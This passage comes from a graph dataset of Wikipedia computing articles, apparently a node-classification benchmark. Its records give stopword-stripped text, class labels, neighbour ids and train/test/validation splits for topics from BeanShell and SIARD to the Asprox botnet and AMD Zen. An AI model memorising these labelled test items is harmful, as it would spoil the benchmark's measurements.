based java syntax indicating beanshell continued fork beanshell beanshell2 created may 2007 now-defunct google code web site beanshell2 project made number fixes enhancements beanshell multiple releases latest version beanshell2 v2.1.8 released february 2014 since closure google code project hosted github december 2012 following proposal accept beanshell apache incubator project beanshell licensed apache software foundation migrated apache extras changing license apache license 2.0 project accepted instead projected become part apache commons future time due changes developers personal circumstances beanshell community however complete move apache remained apache extras project since released beanshell 2.0b5 used apache openoffice apache taverna windows automated installer beanshell double-click created 2013 includes desktop integration features",
    "neighbors": [
      3712,
      9345,
      2181,
      3462,
      4358,
      7176,
      8582,
      910,
      10526,
      1952,
      5031,
      4267,
      5677,
      7983,
      6067,
      9011,
      9780,
      1591,
      6074,
      10683,
      572,
      7485,
      10684,
      3519,
      5567,
      9665,
      10435,
      7750,
      6860,
      3920,
      10193,
      1363,
      11219,
      10581,
      11221,
      4960,
      1250,
      2658,
      2786,
      4069,
      5987,
      3560,
      3561,
      3562,
      7146,
      5612,
      5872,
      8825,
      9714,
      3705,
      3966,
      6143
    ],
    "mask": "Train"
  },
  {
    "node_id": 9079,
    "label": 1,
    "text": "Database_preservation:database preservation database preservation usually involves converting information stored database form likely accessible long term technology changes without losing initial characteristics context content structure appearance behaviour data version 1.0 software independent archiving relational databases siard format developed swiss federal archives 2007 designed archiving relational databases vendor-neutral form siard archive zip-based package files based xml sql:1999 siard file incorporates database content also machine-processable structural metadata records structure database tables relationships zip file contains xml file describing database structure metadata.xml well collection xml files one per table capturing table content siard archive may also contain text files binary files representing database large objects blobs clobs siard permits direct access individual tables exploring zip tools siard archive operational database supports re-integration archived database another relational database management system rdbms supports sql:1999 addition siard supports addition descriptive contextual metadata recorded database embedding documentation files archive siard version 1.0 homologized standard ech-0165 2013 version 2.0 siard preservation format designed developed swiss federal archives auspices e-ark project version 2.0 based version 1.0 defines format backwards-compatible version 1.0 new features version 2.0 include xml schema created researcher josé carlos ramalho university minho capture table information data relational database published 2007 database preservation toolkit dbptk allows conversion database formats including connection live systems purposes digitally preserving databases toolkit allows conversion live backed-up databases preservation formats siard xml-based format created purpose database preservation toolkit also allows conversion preservation formats back live systems allow full functionality databases example supports specialized export mysql optimized phpmyadmin database fully experimented using web interface toolkit originally part roda project released developed e-ark project together new version siard preservation format toolkit uses input output modules module supports read and/or write particular database format live system new modules easily added implementation new interface adding new drivers research projects regard include",
    "neighbors": [
      2688,
      9481,
      10505,
      10258,
      10518,
      4376,
      9112,
      7968,
      290,
      1314,
      7461,
      8742,
      5550,
      5808,
      10418,
      9527,
      3768,
      6331,
      3004,
      9661,
      9663,
      4416,
      2369,
      5441,
      11457,
      8518,
      72,
      853,
      2901,
      9942,
      9177,
      987,
      860,
      9183,
      11362,
      10471,
      8808,
      6383,
      2681,
      9467
    ],
    "mask": "Test"
  },
  {
    "node_id": 9080,
    "label": 5,
    "text": "Locator/Identifier_Separation_Protocol:locator/identifier separation protocol locator/id separation protocol lisp map-and-encapsulate protocol developed internet engineering task force lisp working group basic idea behind separation internet architecture combines two functions routing locators client attached network identifiers client one number space ip address lisp supports separation ipv4 ipv6 address space following network-based map-and-encapsulate scheme lisp identifiers locators ip addresses arbitrary elements like set gps coordinates mac address internet architecture board october 2006 routing addressing workshop renewed interest design scalable routing addressing architecture internet key issues driving renewed interest include concerns scalability routing system impending exhaustion ipv4 address space since iab workshop several proposals emerged attempted address concerns expressed workshop proposals based common concept separation locator identifier numbering internet devices often termed loc/id split current namespace architecture used internet protocol uses ip addresses two separate functions several advantages decoupling location identifier lisp specifically recent discussion several lisp use cases may found ietf active workgroup establishing standards lisp 2016 lisp specifications experimental track lisp workgroup plans moving core specifications onto standards track 2017 locator/identifier separation protocol network elements routers responsible looking mapping end-point-identifiers eid route locators rloc process invisible internet end-hosts mappings stored distributed database called mapping system responds lookup queries lisp beta network initially used bgp-based mapping system called lisp alternative topology lisp+alt replaced dns-like indexing system called ddt inspired lisp-tree protocol design made easy plug new mapping system different design proved benefits proposals already emerged compared testbed developed gain real-life experience lisp participants include google facebook ntt level3 intouch n.v. internet systems consortium january 2014 around 600 companies universities individual contributors 34 countries involved geographical distribution participating routers prefixes responsible observed lispmon project website updated daily multi-company lisp-community initiative lisp4.net/lisp6.net publishes relevant information beta network http //www.lisp4.net/ http //www.lisp6.net/ lisp-lab project coordinated upmc/lip6 aims building lisp network experimentation platform exclusively built using open source lisp nodes openlisp acting itr/etr tunnelling routers ms/mr mapping servers/resolvers ddt root proxy itr/etr partners include two academic institutions upmc tpt two cloud networking sme alphalink nss two network operators renater orange two smes access/edge networking border 6 ucopia one internet exchange point rezopole information http //www.lisp-lab.org platform opened external partners 2014/2015 already interconnected lisp beta network openlisp ddt root lisp also key component number commercial offerings njedge.net vinci consulting provide lisp based services icao considering ground-based lisp candidate technology next-generation aeronautical telecommunications network atn solution development part sesar single european sky atm research fci activities several proposals separating two functions allowing internet scale better proposed instance gse/8+8 network based solution shim6 hip ilnp host based solutions",
    "neighbors": [
      5472,
      2085,
      1638,
      6502,
      5322,
      5933,
      11218,
      7411,
      5749,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 9081,
    "label": 3,
    "text": "Flicky:flicky idea flicky came sega senior leadership wanted exceed success namco mappy 1983 yoji ishii yoshiki kawasaki developed flicky sega one year originally game simply player catch ambiguous dots maze taking inspiration popular song japanese variety show kawasaki gave game urban theme bird characters game originally titled busty flippy finally settling flicky flicky first ported sg-1000 japan later japanese home consoles 1991 flicky released north america europe sega genesis character continued hold cameo appearances sega video games notably within sonic hedgehog series flicky platform game player takes control flightless blue bird named flicky ability run side-to-side jump player must collect small yellow birds called chirps take exit clear round according game artist yoshiki kawasaki flicky friend chirps although players may think mother chirps follow flicky chain collected exit bonus points awarded bringing multiple chirps back single chain 48 total stages stage takes place single wraparound screen scrolls horizontally flicky always center stages completed game loops infinitely increased difficulty mode collected chirps disperse chain comes contact enemy chirps wear sunglasses chirps behave unpredictably dispersed two enemy types standard rounds house cats called tigers green iguanas called iggys enemies simply avoided also defeated throwable items available levels items include telephones flower pots cups bottles flicky pick item walking throw jumping sometimes diamonds may appear thrown rather provide bonus points also bonus rounds flicky attempts catch many falling chirps possible net spark develop flicky came sega desire exceed namco mappy 1983 become popular japanese arcades sega game designer yoji ishii boss wanted design similar dot eater game better flicky developed course one year designed yoji ishii collaboration artist yoshiki kawasaki game evolved simple game kawasaki first envisioned player would catch dots maze took inspiration popular song sparrows power lines 1970s japanese variety show migoro tabegoro waraigoro made main character sparrow platforms walls wires however found power line theme boring thus changed background apartment building taking inspiration one outside office window kawasaki felt anyone around children experienced emotion wanting keep children safe outside returning safe home team wanted imbue message protect children game according kawasaki emotion drives flicky kawasaki used poorly calibrated graphics tablet draw game graphics chirps originally ambiguous dots would disappear collected kawasaki changed dots trailed player increased size 8x8 pixels make way interesting design size large enough simple chick design add difficulty game chirps programmed behave unpredictably touched enemy chirps given sunglasses deemed bad chirps game testing began team created 100 levels four background designs barely space left game kawasaki able change colors backgrounds create variety testing iggy added game flicky originally titled busty american sega branch asked team change term slang usage english game titled flippy changed shortly release 2002 ishii stated trademark issues united states 2018 said flippy similar mappy flicky released arcades may 1984 like many early 1980s sega arcade games flicky ported sg-1000 console port retains 40 arcade levels restructured feature iggy enemy addition behavior chirps slightly modified graphics changed version later ported several home platforms japan including msx sharp x1 fujitsu fm-7 nec pc-8801 1991 flicky ported sega genesis released north america europe japan port released sega meganet genesis port flicky reviewed multiple western publications found game poor graphics sound highly addictive enjoyable gameplay reviewers noted poor initial impressions based appearance sound found sprites simple colors garish music repetitive however began play game found simple appearance complemented simple yet engaging gameplay computer video games described flicky guilty pleasure discussed cute appearance positive light reviewers electronic gaming monthly concluded game aimed children based game cuteness aesthetic provided lower scores accordingly critics computer video games mean machines wrote employees offices disappearing game room play flicky julian mean machines wrote crazy know game crappy laughably-simple pathetic sounding prove addictive challenging long-lasting virtually mega drive game true numerous sega video game compilations feature flicky genesis version compiled game kanzume vol 1 1994 sega cd compilation japan featured cd quality remixes original soundtrack genesis port also featured sonic mega collection 2002 sega genesis collection 2006 sonic ultimate genesis collection 2009 sega mega drive classic collection 2010 even genesis-based plug play devices arcade version released japan sega ages memorial collection vol 1 1996 sega saturn sega memorial selection 1998 windows flicky also ported mobile devices first port 2001 sega ages line japan march 2003 similar variant appeared sonic cafe service exclusive japan 2007 sonic cafe port upgraded better graphics ported north america sega mobile service genesis port released steam 2010 flicky character made cameo appearances several sega arcade games effectively becoming mascot sega early arcade years teddy boy blues 1985 appears shooting target among sega mascots pengo puzzle game bloxeed used special weapon drop blocks playing field also playable sdi 1987 use cheat code flicky minor cameo appearance flash point wish player good luck round racing game super monaco gp 1989 appears racetrack banners game screen flicky also become entire species reoccurring minor character sonic hedgehog series featured prominently sonic 3d flickies island 1996 flicky continued minor cameo appearances sega titles including shenmue 1999 gunstar super heroes 2005 mario sonic olympic games 2007",
    "neighbors": [
      6797,
      9006,
      9093
    ],
    "mask": "Test"
  },
  {
    "node_id": 9082,
    "label": 4,
    "text": "Zerodium:zerodium zerodium american information security company founded 2015 based washington d.c.. main business acquiring premium zero-day vulnerabilities functional exploits security researchers companies reporting research along protective measures security recommendations corporate government clients founder chaouki bekrar also known founding vupen defunct 2015 zerodium first company release full pricing chart zero-days ranging 5,000 1,500,000 per exploit company reportedly spending 400,000 600,000 per month vulnerability acquisitions",
    "neighbors": [
      8320,
      3843,
      5636,
      5764,
      10502,
      2187,
      4240,
      11152,
      10003,
      3092,
      4117,
      8726,
      535,
      1688,
      10132,
      2717,
      9375,
      1440,
      5024,
      9761,
      4644,
      4133,
      5028,
      11175,
      297,
      2857,
      5547,
      8489,
      11052,
      9518,
      9904,
      7601,
      1970,
      9395,
      6326,
      8886,
      1337,
      441,
      1979,
      4027,
      10875,
      9664,
      8133,
      1608,
      3657,
      8779,
      3789,
      4304,
      6484,
      7639,
      8664,
      857,
      1882,
      4314,
      7515,
      4830,
      3807,
      1504,
      4703,
      8288,
      9186,
      8292,
      5349,
      1254,
      3944,
      10477,
      2542,
      3711,
      3956,
      9460,
      7418,
      507,
      5373,
      2815
    ],
    "mask": "Train"
  },
  {
    "node_id": 9083,
    "label": 1,
    "text": "FAME_(database):fame database fame forecasting analysis modeling environment time series database sungard comes along suite apis domain-specific programming language fame software environment several development phases long history lawrence c. rafsky founded gemnet software corp create fame 1981 independent software company located ann arbor michigan first version software delivered harris bank 1983 company purchased citicorp 1984 time development focused time series oriented database engine 4gl scripting language citigroup sold fame private investors headed warburg pincus 1994 management focused fixing bugs developing remote database server access fame invested expanding fame database engine emphasis also placed extending fame creating object-oriented java interface called timeiq replicated many features fame 4gl java period also saw release accesspoint provides url access fame objects multiple output formats acquisition fame sungard 2004 resulted new set priorities focused core fame engine extending 4gl scripting language including another key goal modernize tools support working fame software environment example developers worked leverage fame web access transform fame software run service allows developers architects plug online analytical processing capabilities fame software existing enterprise software empower internal systems better handle complex queries made financial professionals many fame customers run environment within overall technology stack providing improved access wider distribution data analytics rather access standalone fame installations enterprise-oriented technology teams load fame databases procedures within multiple client analytical database server mcadbs providing access fame data via browser applications microsoft excel statistical applications advanced reporting systems crystal reports 2010 sungard merged fame marketmap data marketmap brand fis global acquired sungard 2015 early fame ’ evolution customers obtained loaders company required build maintain processes loading vendor feeds sungard provides service delivers content throughout day fame siteserver fame channel finds fame desktop add-in excel fame desktop excel add-in supports =fmd =fms formula 4gl command prompt formulas placed excel spreadsheets linked fame objects analytics stored fame server sample excel templates research analytics act accelerators clients available template library fame desktop add-in first renamed fame populator marketmap analytics fame connector matlab matlab environment technical computing applications also used financial sector fixed income analysts equity research groups investment firms customers store content fame use matlab access model data matlab-fame connector uses fame java toolkit link matlab scripts fame objects bita curve connector bita curve workstation provides platform link “ database ” analytics content warehoused fame bita curve connector fame users better visualize work content warehouse fame r interface fame customers developed released free software interface links fame objects open source r statistical package originally developed federal reserve board features include sasefame sas provides interface fame databases called sasefame provides dynamic read write access sas application fame databases fame server process troll interface troll ’ interface fame provides read write access troll application fame server directly local fame database 1982–1994 gemnet introduced first release fame 1983 citicorp purchased company 1984 development milestones period mcadbs users could use thin c hli client leverage power 4gl remote host via client/server tcp 7.5 release also introduced important 4gl features including postscript reports database features global names formulas 1994–2004 period focus improving managed content delivery onsite fame warehouses hosted asp fame servers milestones included 2004–present acquired sungard fame ’ development focus shifted 4gl scripting language core fame features milestones included fame 9.2 also added new 4gl debugging features analytical functions graphics reporting improvements core 4gl features included move function new forms shift filespec functions fame search command enhanced path option support memory mapped fame databases tune cache megabytes option helped users better manage large volume warehouses fame 9.3 also introduced new graphical features including bubble charts fame 10 opens environment real-time analysis larger database storage well support new frequencies millisecond weekly patterns new database formats increase maximum size 256 gb period fame also focused expanding managed content delivered database well out-of-the-box object models warehouse builders leverage loading proprietary content",
    "neighbors": [
      5833,
      4107
    ],
    "mask": "Test"
  },
  {
    "node_id": 9084,
    "label": 3,
    "text": "Macintosh_XL:macintosh xl macintosh xl modified version apple lisa personal computer made apple computer inc macintosh xl configuration computer shipped macworks xl lisa program allowed 64 k macintosh rom emulation identical machine previously sold lisa 2/10 lisa os macintosh xl 400k 3.5 floppy drive internal 10 mb proprietary widget hard drive provision optional 5 10 mb external profile hard drive addition parallel interface card machine uses motorola 68000 cpu clocked 5 mhz together 512kb ram time release january 1985 macintosh xl colloquially referred hackintosh although name since used generally describe macintosh computers assembled unusual combinations parts apple transition intel processors denote pcs running osx86 hacked version mac os x macintosh xl discontinued april 1985 roots lisa — unlike macintosh computers — stock macintosh xl used rectangular pixels resolution macintosh xl 12 inch 30.5 cm display 720x364 square pixels available via macintosh xl screen kit upgrade changed resolution 608x432 cpu could replaced new cpu board containing 8 mb ram called xlerator 18 maximum upgraded ram conventional add-in ram cards 2 mb four times larger maximum capacity earlier macintosh computers modifications cpu board macintosh xl could accommodate 4 mb ram macworks plus developed sun remarketing successor macworks xl order provide application compatibility macintosh plus computer macworks plus added support 800 kb 3.5-inch floppy disk system software version 6.0.3 macworks plus ii extended 7.5.5 limit imposed 68000 processors re-badging xl last-ditch effort apple save poorly selling lisa usurped macintosh line two years marginal sales apple unprepared record number orders placed newest member macintosh family despite relative success macintosh xl discontinued unavailable parts ordered keep xl production last parts ran apple made decision shut production good 1986 apple offered lisa/xl owners opportunity turn computer along us 1,498 receive exchange macintosh plus hard disk 20 list price us 4,098 time apple dropped xl price list september 1985 sun remarketing logan utah bought number apple remaining inventory continued sell license updated version macworks plus re-branded macintosh professional though new lisas available sale development continued macworks plus support installed base lisas making relevant closely related cousin macintosh plus macintosh xl shares legacy lisa however increased sales emulation macintosh operating system proved macintosh family badly needed professional environment could support larger monitors greater memory expandability macintosh 512k offered",
    "neighbors": [
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      8253,
      576,
      1090,
      4180,
      10838,
      10840,
      9312,
      7269,
      8806,
      6258,
      10357,
      4220,
      10365,
      10878,
      6783,
      4741,
      8842,
      6283,
      7824,
      147,
      9363,
      7830,
      6807,
      4258,
      7842,
      7844,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      6377,
      2282,
      1772,
      1776,
      10481,
      1290,
      781,
      4879,
      784,
      8480,
      10023,
      4910,
      7983,
      11066,
      9022,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      7549,
      11649,
      3977,
      6539,
      1428,
      3483,
      2979,
      11171,
      8109,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      10199,
      8665,
      9182,
      2023,
      5616,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9085,
    "label": 4,
    "text": "Trust_no_one_(Internet_security):trust one internet security trust one tno approach towards internet software security issues internet communication software packages sort secrecy needed usually sort encryption applied trust one approach teaches one oneself trusted comes storage keys behind applied encryption technology many encryption technologies rely trust external party instance security secure end-to-end ssl connections relies trust certificate authority ca trust one design philosophy requires keys encryption always stay hands user applies implies external party access encrypted data assumed encryption strong enough also implies external party provide backup mechanism password recovery although philosophy trust one least assures reliability communication user creates real life society many communication means rely trust relationship least two parties tno crypt microsoft store example utility leverages methodology https //www.microsoft.com/en-us/p/tno-crypt/9phgpmz9dkvf activetab=pivot overviewtab",
    "neighbors": [
      1315,
      6916,
      517,
      11051,
      1196
    ],
    "mask": "Test"
  },
  {
    "node_id": 9086,
    "label": 4,
    "text": "Blancco:blancco blancco ltd. international data security company specializes data erasure computer reuse corporations governments computer remarketing companies founded headquartered joensuu finland company operates offices across europe north america middle east russia asia australasia blancco wholly owned subsidiary regenersis strategic outsourcing company consumer technology companies 1997 janne tervo kim väisänen co-founded carelian innovation ltd company ’ first data erasure product blancco data cleaner released 1999 2000 carelian innovations ltd. changed name blancco ltd. sun microsystems blancco formed partnership 2007 deliver secure flexible data erasure solutions 2007 blancco approved included nato information assurance product catalogue niapc company expanded product line 2008 introduction blancco 4.5 client series added server support data center edition enables safe reuse hard drives mass storage environments clients sun hp emc need deep data expunging company released blancco mobile smartphone erasure 2012 2011 blancco lun launched 2012 blancco 5 management console 3 released company also acquired dban 2012 received common criteria certification year blancco acquired regenersis april 2014 blancco ’ data wipe products scale single reusable pc erasure tool software erasure requirements mass storage environments data centers various versions support erasure different hardware configurations blancco ’ security certificates approvals include common criteria iso 15408 communications electronics security group united kingdom information technology group cesg nato listed nato information assurance product catalogue",
    "neighbors": [
      9665,
      1475,
      3972,
      8997,
      2534,
      5384,
      7369,
      8074,
      8904,
      11368,
      1873,
      7090,
      10195,
      4408,
      9499,
      6494,
      831
    ],
    "mask": "Test"
  },
  {
    "node_id": 9087,
    "label": 4,
    "text": "Asprox_botnet:asprox botnet asprox botnet network hacking tool used gain access ipv4 address network attacks microsoft windows mac e-mails untrusted websites social networking websites block fresh installation software compromise devices like computers printers ipads phones tablets playstation infection removed anti-virus like norton mcafee avast avg webroot etc network firewall lock programming tool security remove infection prevent network contamination future well since discovery 2008 asprox botnet involved multiple high-profile attacks various websites order spread malware botnet consists roughly 15,000 infected computers may 2008 although size botnet highly variable controllers botnet known deliberately shrink later regrow botnet order prevent aggressive countermeasures community botnet propagates somewhat unusual way actively searches infects vulnerable websites running active server pages finds potential target botnet performs sql injections website inserting iframe redirects user visiting site site hosting malware botnet usually attacks waves goal wave infect many websites possible thus achieving highest possible spread rate wave completed botnet lay dormant extended amount time likely prevent aggressive counterreactions security community initial wave took place july 2008 infected estimated 1,000 2,000 pages additional wave took place october 2009 infecting unknown number websites another wave took place june 2010 increasing estimated total number infected domains 2,000 estimated 10,000 13,000 within day infection targets asprox botnet randomly determined google searches high-profile websites infected past infections received individual coverage",
    "neighbors": [
      3072,
      899,
      10756,
      3724,
      3347,
      4883,
      2325,
      278,
      9630,
      10657,
      4648,
      939,
      46,
      10297,
      3643,
      7739,
      7996,
      11583,
      9664,
      9154,
      8133,
      10952,
      81,
      4945,
      8789,
      10457,
      7515,
      988,
      3807,
      8032,
      3941,
      10477,
      4462,
      2041,
      10875,
      3581,
      5886
    ],
    "mask": "Test"
  },
  {
    "node_id": 9088,
    "label": 4,
    "text": "Michigan_Cyber_Range:michigan cyber range michigan cyber range established merit network summer 2012 teach cybersecurity certification courses provide cybersecurity-related services merit network staffs operates michigan cyber range ann arbor michigan range infrastructure contains virtual servers placed merit fiber-optic network michigan cyber range currently four physical locations michigan campuses eastern michigan university ypsilanti michigan ferris state university big rapids northern michigan university marquette 110th attack wing facility battle creek expansion plans could involve many 10 sites michigan cyber range foundational piece michigan governor rick snyder cyber initiative launched october 2011 improve cybersecurity efforts protect families communities businesses government merit network ceo president welch professor helped create united states military academy cybersecurity program worked david behen state brigadier general mike stone michigan national guard create vision cyber range secure start-up funding throughout 2012 public private organizations pledged funds michigan cyber range created staffed william j joe adams joined merit network june 2012 executive director research michigan cyber range adams career signal corps officer u.s. army formerly cio national defense university adams also served professor research scientist west point network engineer supreme headquarters allied powers europe shortly hiring adams assembled staff create maintain michigan cyber range cybersecurity training environment called alphaville alphaville virtual environment simulates computer systems town hall library small company police station power company organizations companies practice detection mitigation cybersecurity threats using alphaville environment november 9 2012 michigan governor snyder participated ribbon-cutting ceremony michigan cyber range michigan cyber range partners include merit network u.s. department homeland security u.s. department energy national institute standards technology dte energy consumers energy plante moran pllc juniper networks eastern michigan university michigan state police michigan department military veterans affairs michigan economic development corporation michigan department technology management budget january 2013 michigan cyber range began collaboration arrangement mile2 developer provider vendor neutral professional certifications cybersecurity industry mile2 provides course materials instructors certification exams michigan cyber range range offers full curriculum training courses many cybersecurity disciplines mile2 recognized u.s. national security agency nsa information assurance ia courseware institution company nsa cnss-accredited well nist niccs-mapped organizations businesses use michigan cyber range conduct cybersecurity exercises simulate various kinds cyberattacks july 24 2013 members west michigan cyber security consortium wmcsc participated red team–blue team exercise wmcsc team members defended resources virtual town cyber attacks initiated michigan cyber range staff michigan cyber range members west michigan cyber security consortium wmcsc members michigan cyber civilian corps mic3 joined forces second red vs. blue team exercise campus davenport university july 23 2014 september 2013 merit network introduced new cybersecurity service called merit secure sandbox uses infrastructure michigan cyber range organizations use service cybersecurity exercises educational purposes software testing march 25 2014 michigan cyber range opened first cybersecurity hub kind u.s. national guard base dedicating facility located 110th attack wing battle creek michigan michigan governor rick snyder attended ribbon-cutting ceremony event teams battle creek participated cybersecurity exercises similar teams united states military academy west point california national guard october 15 2014 consumers energy dte energy conducted incident response exercise using michigan cyber range representatives two power companies michigan state police worked closely cyber range staff create exercise called power phoenix required participants diagnose mitigate malware-compromised computer network scada environment early 2015 wayne county community college district wcccd conjunction michigan cyber range mile2 hosted groundbreaking veteran retraining program 13-week program prepared group military veterans career cybersecurity 17 students participated retraining program veterans selected based experience aptitude conjunction wayne county ’ veterans affairs office 2016 michigan cyber range added new publicly-accessible hubs southeast michigan location provides certification courses cybersecurity training exercises product hardening/testing direct connection michigan cyber range cyber range hubs opened inside velocity center macomb-oakland university sterling heights march 18th pinckney community high school december 7th fall 2016 merit network michigan governor rick snyder launched governor high school cyber challenge competition high school students test skills computer science information technology cybersecurity final round challenge happened north american international cyber summit hosted governor snyder october 17 2016 three-person team clinton high school crowned champions competition defeating 28 teams inaugural event michigan cyber range provided challenges infrastructure annual cyber competition michigan cyber range twice named north american authorized training center atc year mile2 2017 michigan cyber range doubled participation governor ’ high school cyber challenge 292 high school students 584 included successful elicitation participation native american tribal areas michigan another milestone addition cyber range hubs florida georgia continuing commitment since 2015 cyber range provides exercises support infrastructure us cyber challenge national cyber competition sponsored department homeland security milestones include creation virtual environments facilitate cybersecurity involvement kinetic training exercises creation international cyber exercise ice promote collaboration partnership states ’ national guard units countries participating state partnership program spp successful launch regional cybersecurity education collaboration partnership state michigan cisco ice event 2017 run naics – 12 states 10 countries participated",
    "neighbors": [
      7528,
      7887,
      6834,
      6645,
      11097,
      316
    ],
    "mask": "None"
  },
  {
    "node_id": 9089,
    "label": 4,
    "text": "Packet_Storm:packet storm packet storm security popular information security website offering current historical computer security tools exploits security advisories operated group security enthusiasts publish new security information offer tools educational testing purposes site originally created ken williams sold 1999 kroll o'gara year later given back security community kroll o'gara packet storm awarded mixter 10,000 whitepaper contest dedicated mitigation distributed denial service attacks today offer suite consulting services site referenced hundreds books 2013 packet storm launched bug bounty program buy working exploits would given back community testing purposes later year worked security researcher help expose large scale shadow profile issue popular internet site facebook facebook claimed 6 million people affected additional testing packet storm exposed numbers accurately reported",
    "neighbors": [
      2409,
      6473,
      5003,
      3473,
      2007,
      2558,
      735
    ],
    "mask": "None"
  },
  {
    "node_id": 9090,
    "label": 3,
    "text": "UltraSPARC_T2:ultrasparc t2 sun microsystems ultrasparc t2 microprocessor multithreading multi-core cpu member sparc family successor ultrasparc t1 chip sometimes referred codename niagara 2 sun started selling servers t2 processor october 2007 t2 commodity derivative ultrasparc series microprocessors targeting internet workloads computers storage networking devices processor manufactured 65 nm available eight cpu cores core able handle eight threads concurrently thus processor capable processing 64 concurrent threads new features include 8 stages integer operations instead 6 t1 t2 processor found following products sun fujitsu computer systems sun also licensed t2 processor themis computer introduced first non-sun t2-based servers 2008 april 2008 sun released servers based ultrasparc t2 plus processor smp capable version ultrasparc t2 sun released ultrasparc t2 plus processor following changes ultrasparc t2 plus processors found following products sun fujitsu computer systems two-way smp servers four-way smp server high performance computing virtual laboratory canada built compute cluster using 78 sun sparc enterprise t5140 servers two 1.2 ghz t2 plus chips t5140 server cluster close 10,000 compute threads making ideal high-throughput workloads like t1 t2 supports hyper-privileged execution mode sparc hypervisor runs mode partition t2 system 64 logical domains two-way smp t2 plus system 128 logical domains run independent operating system instance ultrasparc t2 offers variety performance improvements former ultrasparc t1 processor ultrasparc t2 performance related tunings documented oracle engineers blogs peak power consumption go high 123 watts t2 typically consumes 95 watts nominal system operation 72 watts t1 sun explains due higher degree system integration onto chip april 12 2006 sun announced tape-out ultrasparc t2 sun announced t2 release 7 august 2007 billing world fastest microprocessor april 9 2008 sun announced ultrasparc t2 plus december 11 2007 sun made ultrasparc t2 processor design publicly available gnu general public license via opensparc project release includes",
    "neighbors": [
      5378,
      9090,
      9731,
      1801,
      4235,
      1809,
      4241,
      7702,
      1818,
      8863,
      10789,
      1707,
      2731,
      10926,
      3247,
      9137,
      6322,
      10675,
      1461,
      4664,
      4285,
      6464,
      7104,
      9665,
      8644,
      3911,
      2895,
      3919,
      4561,
      597,
      1115,
      731,
      2269,
      6107,
      9569,
      9955,
      7270,
      11626,
      7022,
      10734,
      1776,
      4465,
      11636,
      11125,
      630,
      1399,
      1788
    ],
    "mask": "Test"
  },
  {
    "node_id": 9091,
    "label": 3,
    "text": "PSX_(digital_video_recorder):psx digital video recorder psx sony digital video recorder fully integrated playstation 2 video game console released japan december 13 2003 since designed general-purpose consumer video device marketed main sony corporation instead sony computer entertainment carry usual playstation branding high cost resulted poor sales meaning psx never released outside japan making commercial failure device fully functional digital video recorder included infrared remote control s-video composite video rf inputs able tune analog vhf catv also linked playstation portable transfer photos videos music via usb ports features software non-linear video editing image editing audio editing dvd+r support introduced future update first device use sony xrossmediabar xmb graphical user interface later used playstation portable playstation 3 2008-era bravia tvs psx fully supports playstation playstation 2 software slot-loading dvd drive onboard ee+gs chip unification ps2 emotion engine graphics synthesizer chips online game compatibility available using broadband connection games use ps2 hdd final fantasy xi supported well psx supplied game controllers two controller ports back device psx compatible standard ps/ps2 controllers memory cards exception pocketstation variant dualshock 2 controller marketed specifically psx also sold featured 4-meter long cord bit longer standard versions controller two playstation memory card ports front psx behind panel cover different placement memory card slots located controller ports standard ps2 consoles psx incompatible playstation multitap ps2 counterpart psx-compatible multitap ever produced games require use two usb ports also incompatible psx like standard ps2 consoles psx laid horizontally stood vertically psx released eight retail configurations lifespan 5000 series embossed logo top grey stripe back shipped 160 gb hard disk drives 7000 series colored logo top black stripe back contained 250 gb drives software updates made available disc download 7500/7700 models added ghost reduction tuner inclusion bs uhf/vhf connectors varied model final revision series supported playstation portable video export via memory stick revisions console support psp games compatible umd discs models two sets indicator lights power lights infrared receivers one along front horizontal orientation second strip along top-back vertical orientation 'disk rec indicator front device later models known ps1 first playstation console came known colloquially provisional codename psx adopted echo msx home computer standard sold sony companies throughout 1980s cause confusion device referred psx initially displayed ceatec white silver yellow red blue white variant released commercially limited edition silver model made available 2004",
    "neighbors": [
      10368,
      4098,
      643,
      3077,
      11398,
      10761,
      6799,
      921,
      9508,
      6311,
      9512,
      684,
      9006,
      7983,
      306,
      1587,
      1091,
      9543,
      10056,
      6732,
      10316,
      6738,
      8917,
      6873,
      859,
      4060,
      607,
      359,
      5736,
      8937,
      7916,
      1776,
      3824,
      5746,
      7028,
      7801,
      8316,
      6781
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9092,
    "label": 3,
    "text": "Zen_(microarchitecture):zen microarchitecture zen codename computer processor microarchitecture amd first used ryzen series cpus february 2017 first zen-based preview system demonstrated e3 2016 first substantially detailed event hosted block away intel developer forum 2016 first zen-based cpus codenamed summit ridge reached market early march 2017 zen-derived epyc server processors launched june 2017 zen-based apus arrived november 2017 zen clean sheet design differs long-standing bulldozer architecture zen-based processors use 14 nm finfet process reportedly energy efficient execute significantly instructions per cycle smt introduced allowing core run two threads cache system also redesigned making l1 cache write-back zen processors use three different sockets desktop mobile ryzen chips use am4 socket bringing ddr4 support high-end desktop zen-based threadripper chips support quad-channel ddr4 ram offer 64 pcie 3.0 lanes vs 24 lanes using tr4 socket epyc server processors offer 128 pci 3.0 lanes octal-channel ddr4 using sp3 socket socket am4 cpus based zen microarchitecture 7th gen apus athlon x4s based excavator microarchitecture zen based soc design memory pcie sata usb controllers incorporated chip processor cores advantages bandwidth power expense chip complexity die area soc design allows zen microarchitecture scale laptops small-form factor mini pcs high-end desktops servers according amd main focus zen increasing per-core performance new improved features include zen architecture built 14 nanometer finfet process subcontracted globalfoundries turn licenses 14nm process samsung electronics gives greater efficiency 32 nm 28 nm processes previous amd fx cpus amd apus respectively summit ridge zen family cpus use am4 socket feature ddr4 support 95 w tdp thermal design power newer roadmaps n't confirm tdp desktop products suggest range low-power mobile products two zen cores 5 15 w 15 35 w performance-oriented mobile products four zen cores zen core decode four instructions per clock cycle includes micro-op cache feeds two schedulers one integer floating point segments core two address generation units four integer units four floating point units two floating point units adders two multiply-adders however using multiply-add-operations may prevent simultaneous add operation one adder units also improvements branch predictor l1 cache size 64 kib instructions per core 32 kib data per core l2 cache size 512 kib per core l3 1–2 mb per core l3 caches offer 5× bandwidth previous amd designs amd began planning zen microarchitecture shortly re-hiring jim keller august 2012 amd formally revealed zen 2015 team charge zen led keller left september 2015 3-year tenure amd senior fellow chief architect michael clark zen originally planned 2017 following arm64-based k12 sister core amd 2015 financial analyst day 